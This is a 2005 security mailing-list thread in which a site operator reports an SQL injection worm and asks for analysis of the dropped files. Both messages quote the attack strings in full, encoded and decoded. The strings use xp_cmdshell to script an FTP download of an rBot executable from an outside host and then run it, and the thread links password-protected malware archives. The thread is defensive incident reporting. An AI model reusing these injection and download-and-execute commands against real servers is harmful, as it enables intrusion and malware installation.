From: mducharme at cybergeneration.com (Maxime Ducharme)
Subject: Re: [Dshield] SQL injection worm ?


Hi to the List

today we received the same SQL injection attack
on the same URL :

IP : 24.1.139.29
(c-24-1-139-29.client.comcast.net)
User Agent : none sent
HTTP Verb : GET /theasppage.asp?anID=
Attack :
377';exec MASTER..xp_cmdshell 'mkdir %systemroot%\system32\Macromed\lolx\';
exec MASTER..xp_cmdshell 'echo open z.z.z.z 21 >>
%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo USER chadicka r0ckpaul >>
%systemroot%\system32\macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo binary >>
%systemroot%\system32\macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo get lol.exe
%systemroot%\system32\Macromed\lolx\arcdlrde.exe >>
%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo quit >>
%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell
'ftp.exe -i -n -v -s:%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'del %systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell
'%systemroot%\system32\Macromed\lolx\arcdlrde.exe'--

The lol.exe file can be found in this archive for inspection :
http://www.cybergeneration.com/security/2005.01.19/lol.zip
zip pass is das978tewa234

Norton with definitions of 12 jan. doesnt find anything
suspicious.

I'm interested if someone do an analysis on this file.

Have a nice day

Maxime Ducharme
Programmeur / Sp?cialiste en s?curit? r?seau


----- Original Message ----- 
From: "Maxime Ducharme" <mducharme@...ergeneration.com>
To: <full-disclosure@...ts.netsys.com>; "General DShield Discussion List"
<list@...ts.dshield.org>; <incidents@...urityfocus.com>
Sent: Wednesday, January 05, 2005 12:22 PM
Subject: [Dshield] SQL injection worm ?


>
> Hi list,
>     we receveid a particular SQL injection attack
> on one of our site.
>
> Attack looks like :
> 2005-01-05 14:39:20 24.164.202.24 - W3SVCX SRVNAME x.x.x.x 80 GET
> /Nouvelles.asp
>
id_nouvelle=377';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68
>
%65%6C%6C%20'mkdir%20%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5C';%65%7
>
8%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20op
> en%20y.y.y.y%2021%20%3E%3E%20%25systemroot%25%5Csystem32%5CMacromed%
>
5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%
>
68%65%6C%6C%20'echo%20USER%20hahajk%20hahaowned%20%3E%3E%20%25systemroot%25%
>
5Csystem32%5Cmacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..
>
%78%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20get%20rBot.exe%20%25systemroot%2
>
5%5Csystem32%5CMacromed%5Clolx%5Carcdlrde.exe%20%3E%3E%20%25systemroot%25%5C
>
system32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%7
>
8%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20quit%20%3E%3E%20%25systemroot%25%5
>
Csystem32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%
>
78%70%5F%63%6D%64%73%68%65%6C%6C%20'ftp.exe%20-i%20-n%20-v%20-s:%25systemroo
>
t%25%5Csystem32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45
>
%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'del%20%25systemroot%25%5Csystem32%
>
5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%6
>
3%6D%64%73%68%65%6C%6C%20'%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5Car
>
cdlrde.exe'--|17|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Lin
> e_1:_Incorrect_syntax_near_''. 500 0 0 1395 570 HTTP/1.1
> attacked.web.site.com - - -
>
> HTTP request contains only 2 fields (beside HTTP method) :
> Connection: Keep-Alive
> Host: attacked.web.site.com
>
> (I obviously replaced the name of the site).
>
> Decoded SQL injection looks like :
> exec MASTER..xp_cmdshell 'mkdir %systemroot%\system32\Macromed\lolx\';
> exec MASTER..xp_cmdshell 'echo open y.y.y.y 21 >>
> %systemroot%\system32\Macromed\lolx\blah.jkd';
> exec MASTER..xp_cmdshell 'echo USER hahajk hahaowned >>
> %systemroot%\system32\macromed\lolx\blah.jkd';
> exec MASTER..xp_cmdshell 'echo get rBot.exe
> %systemroot%\system32\Macromed\lolx\arcdlrde.exe >>
> %systemroot%\system32\Macromed\lolx\blah.jkd';
> exec MASTER..xp_cmdshell 'echo quit >>
> %systemroot%\system32\Macromed\lolx\blah.jkd';
> exec MASTER..xp_cmdshell
> 'ftp.exe -i -n -v -s:%systemroot%\system32\Macromed\lolx\blah.jkd';
> exec MASTER..xp_cmdshell 'del
%systemroot%\system32\Macromed\lolx\blah.jkd';
> exec MASTER..xp_cmdshell '%systemroot%\system32\Macromed\lolx\arcdlrde.exe
>
> y.y.y.y is a foreign IP in Europe which host FTP an WWW server.
> I sent a notice this this site sysadmin about the situation.
>
> I have been able to connect to this FTP with the account hahajk/hahaowned
> (which do not seem legit to me ...) and download suspicious files.
> I mirrored them here :
> http://www.cybergeneration.com/security/2005.01.05/rbot.exe_ftp.zip
> zip pass is 968goyw439807r3qw
>
> 24.164.202.24 is on rr.com networks, they have also been advised.
>
> I know rbot.exe is known to be Randex worm, but i'd like that have
> some other results / analysis.
>
> I also found a "test.asp" file which contains the Spybot worm.
>
> Weird thing is, I searched for this hosts's activity on every server
> and every firewall we run, and I only see 1 TCP connection which
> is the prepared SQL injections attack, nothing else.
>
> Anybody see similar activity ?
>
> I'm asking since I want to know if we are targeted by someone of
> by a worm like Santy of use search engines to find vulnerable
> ASP scripts.
>
> Thanks in advance
>
> Happy new year to everyone !
>
> Maxime Ducharme
> Programmeur / Sp?cialiste en s?curit? r?seau
>
>
>
> -------------- Sponsor Message ------------------------------------
> SANS Intrusion Immersion Training: Orlando, FL, February 3-9th
> http://www.sans.org/orlando05
>
> _______________________________________________
> send all posts to list@...ts.dshield.org
> To change your subscription options (or unsubscribe), see:
http://www.dshield.org/mailman/listinfo/list
>

Powered by blists - more mailing lists